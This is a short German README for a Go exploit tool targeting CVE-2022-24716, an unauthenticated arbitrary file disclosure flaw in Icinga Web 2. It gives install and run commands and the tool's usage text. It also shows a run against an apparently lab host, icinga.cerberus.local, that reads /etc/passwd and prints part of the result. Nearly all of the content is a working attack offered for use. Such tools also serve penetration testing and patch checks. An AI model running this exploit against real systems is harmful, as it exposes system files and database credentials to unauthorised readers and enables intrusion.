
CVE-2022-24716 (Beliebige Datei-Offenlegung Icingaweb2)
Icinga Web 2 ist eine quelloffene Überwachungs-Weboberfläche, ein Framework und eine Kommandozeilenschnittstelle. Nicht authentifizierte Benutzer können die Inhalte von benutzerzugänglichen lokalen Systemdateien des Webservers offenlegen, einschließlich icingaweb2-Konfigurationsdateien mit Datenbank-Anmeldeinformationen.
CVE-2022-24716 erfordert golang und kann wie folgt heruntergeladen werden:
go install -v github.com/joaoviictorti/CVE-2022-24716@latest
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080
Dadurch wird die Hilfe für das Tool angezeigt. Hier sind alle unterstützten Optionen:
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
[-p|--proxy "<value>"]
CVE-2022-24716 - Arbitrary File Disclosure
Arguments:
-h --help Print help information
-u --url Insert url
-f --file Insert file
-p --proxy Insert proxy
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......